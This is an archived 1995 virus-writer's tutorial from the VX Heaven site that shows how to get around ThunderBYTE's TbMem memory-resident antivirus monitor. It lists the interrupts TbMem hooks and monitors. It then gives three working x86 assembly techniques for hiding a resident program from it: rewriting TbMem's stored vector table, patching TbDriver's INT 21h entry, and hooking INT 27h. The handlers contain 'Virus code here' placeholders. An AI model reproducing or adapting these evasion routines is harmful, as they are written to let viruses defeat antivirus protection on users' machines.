Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

TBMEM FLAWS

Darkman
Vlad [4]
April 1995

[Back to index] [Comments]

Introduction

This document is another example of how to make a program resident in memory without the memory resident of ThunderBYTE Anti-Virus: TbMem detects it. This document also covers which interrupts are hooked by TbMem and which interrupts are monitored by TbMem. All examples in this document will hook interrupt 21h.

Thunderbyte B.V. about TbMem

Controlling memory: TbMem

TbMem detects attempts from programs to remain resident in memory, and ensures that no program can remain resident in memory without permission. Since most viruses remain resident in memory, this is a powerful weapon against all such viruses, known or unknown. Permission information is maintained in the Anti-Vir.Dat files. TbMem also protects your CMOS memory against unwanted modifications.

Interrupts hooked by TbMem

These interrupts are hooked by TbMem:

	INT 09h (IRQ 1 Keyboard) [TBSeg:0269]
	INT 2Fh (Software Multiplex) [TBSeg:00DB]

Interrupts monitored by TbMem

These interrupts are monitored by TbMem:

INT 08h (IRQ 0 System timer) [TBSeg:0060]
INT 09h (IRQ 1 Keyboard) [TBSeg:0064]
INT 10h (BIOS System Video Services) [TBSeg:0068]
INT 13h (BIOS Fixed disk/FDD Services) [TBSeg:004C]
INT 15h (BIOS System Services) [TBSeg:0088]
INT 16h (BIOS Keyboard Services) [TBSeg:006C]
INT 17h (BIOS Printer Services (LPT)) [TBSeg:007C]
INT 1Ah (BIOS Real-Time Clock Services) [TBSeg:0074]
INT 1Ch (BIOS User Timer Tick) [TBSeg:005C]
INT 20h (DOS Program Terminate) [TBSeg:0050]
INT 21h (DOS Function call) [TBSeg:0054]
INT 26h (DOS Absolute Disk Write) [TBSeg:0090]
INT 28h (DOS Idle) [TBSeg:0070]
INT 29h (DOS Fast Console Output) [TBSeg:0078]
INT 2Ah (Local Area Network) [TBSeg:0098]
INT 2Fh (Software Multiplex) [TBSeg:0058]
INT 40h (BIOS Diskette Service) [TBSeg:008C]
INT 50h (BIOS Reserved) [TBSeg:0094]
INT 70h (IRQ 8 AT Real Time Clock) [TBSeg:0080]
INT 76h (IRQ 14 AT Fixed Disk) [TBSeg:0084]

TbMem will also warn the user if INT 27h (DOS Terminate and Stay Res.) or INT 21h, function 31h (DOS Function call, Terminate but stay resident) is called.

How to trick TbMem 1/3

The below code must be included to trick TbMem 1/3:

  1. Hook interrupt 21h.
  2. Modify TbMems interrupt vector table.

Hook interrupt 21h

The below code shows an example of how to hook interrupt 21h:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt table
lea di,int21adr		; DI = offset of int21adr
mov si,(21h*04h)	; SI = offset of interrupt 21h
movsw 			; Store address of interrupt 21h \
movsw 			; in int21adr                    /
mov word ptr ds:[21h*04h],offset int21handler
mov ds:[21h*04h+02h],es ; Intercept interrupt 21h
pop ds			; Load DS from stack

Modify TbMems interrupt vector table

The below code shows an example of how to modify TbMems interrupt vector table:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt vectors
mov ds,ds:[09h*04+02h]	; DS = Segment of TbMem
mov word ptr ds:[0054h],offset int21handler
mov ds:[0056h],es 	; Modify the segment of interrupt 21h
push ds 		; Save DS at stack

How to trick TbMem 2/3

The below code must be included to trick TbMem 2/3:

  1. Installation check.
  2. Hook interrupt 60h.
  3. Modify TbDrivers interrupt 21h.
  4. Interrupt 60h handler.

Installation check

The below code shows an example of how to check if the trick allready has been installed:

mov ax,63ffh		; Interrupt 21h service
int 21h			; Do it!
cmp ax,bx		; Already resident?
je trickexit		; Equal? Jump to trickexit

; Trick TbMem here...

trickexit:

Hook interrupt 60h

The below code shows an example of how to hook interrupt 60h:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt table
mov word ptr ds:[60h*04h],offset int60handler
mov ds:[60h*04h+02h],es ; Intercept interrupt 60h
pop ds			; Load DS from stack

Modify TbDrivers interrupt 21h

The below code shows an example of how to modify TbDrivers interrupt 21h:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt vectors
lds si,ds:[21h*04h]	; Get address of interrupt 21h
mov [si],060cdh		; Write a INT 60h instruction
pop ds			; Load DS from stack

Interrupt 60h handler

The below code shows an example of an interrupt 60h handler:

int60handler proc near	; Interrupt 60h handler
cmp ax,63ffh		; Interrupt 60h service?
je int60servi		; Equal? Jump to int60servi

; Virus code here...

iret			; Interrupt return!
int60servi:
mov bx,ax
iret			; Interrupt return!
endp

How to trick TbMem 3/3

The below code must be included to trick TbMem 3/3:

  1. Installation check.
  2. Hook interrupt 27h.
  3. Interrupt 27h handler.
  4. Interrupt 21h handler.

Installation check

The below code shows an example of how to check if the trick allready has been installed:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt vectors
lds si,ds:[27h*04h]	; Get address of interrupt 27h
cmp [si],5350h		; Interrupt 27h hooked?
pop ds			; Load DS from stack
je trickexit		; Already hooked? Jump to trickexit

; Trick TbMem here...

trickexit:

Hook interrupt 27h

The below code shows an example of how to hook interrupt 27h:

push ds			; Save DS at stack
xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt table
lea di,int27adr		; DI = offset of int27adr
mov si,(27h*04h)	; SI = offset of interrupt 27h
movsw			; Store address of interrupt 27h \
movsw			; in int27adr                    /
mov word ptr ds:[27h*04h],offset int27handler
mov ds:[27h*04h+02h],es ; Intercept interrupt 27h
pop ds			; Load DS from stack

Interrupt 27h handler

The below code shows an example of an interrupt 27h handler:

int27handler proc near	; Interrupt 27h handler
push ax			; Save AX at stack
push bx			; Save BX at stack

mov ax,63feh		; Interrupt 21h service
int 21h			; Do it!
cmp ax,bx		; Already resident?
je int27exit		; Equal? Jump to int27exit

push di			; Save DI at stack
push si			; Save SI at stack
push ds			; Save DS at stack
push es			; Save ES at stack

xor ax,ax		; Clear AX
mov ds,ax		; DS = segment of interrupt table
push cs			; Save CS at stack
pop es			; Load ES from stack
lea di,int21adr		; DI = offset of int21adr
mov si,(21h*04h)	; SI = offset of interrupt 21h
movsw			; Store address of interrupt 21h \
movsw			; in int21adr /
mov word ptr ds:[21h*04h],offset int21handler
mov ds:[21h*04h+02h],cs ; Intercept interrupt 21h

pop es			; Load ES from stack
pop ds			; Load DS from stack
pop si			; Load SI from stack
pop di			; Load DI from stack
int27exit:
pop bx			; Load BX from stack
pop ax			; Load AX from stack

db 0eah			; Object code of jump far
int27adr dd ?		; Address of interrupt 27h
endp

Interrupt 21h handler

The below code shows an example of an interrupt 21h handler:

int21handler proc near	; Interrupt 21h handler
cmp ax,63feh		; Interrupt 21h service?
je int21servi		; Equal? Jump to int21servi

; Virus code here...

db 0eah			; Object code of jump far
int21adr dd ?		; Address of interrupt 21h
int21servi:
mov bx,ax
iret			; Interrupt return!
endp

Final tips and tricks

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua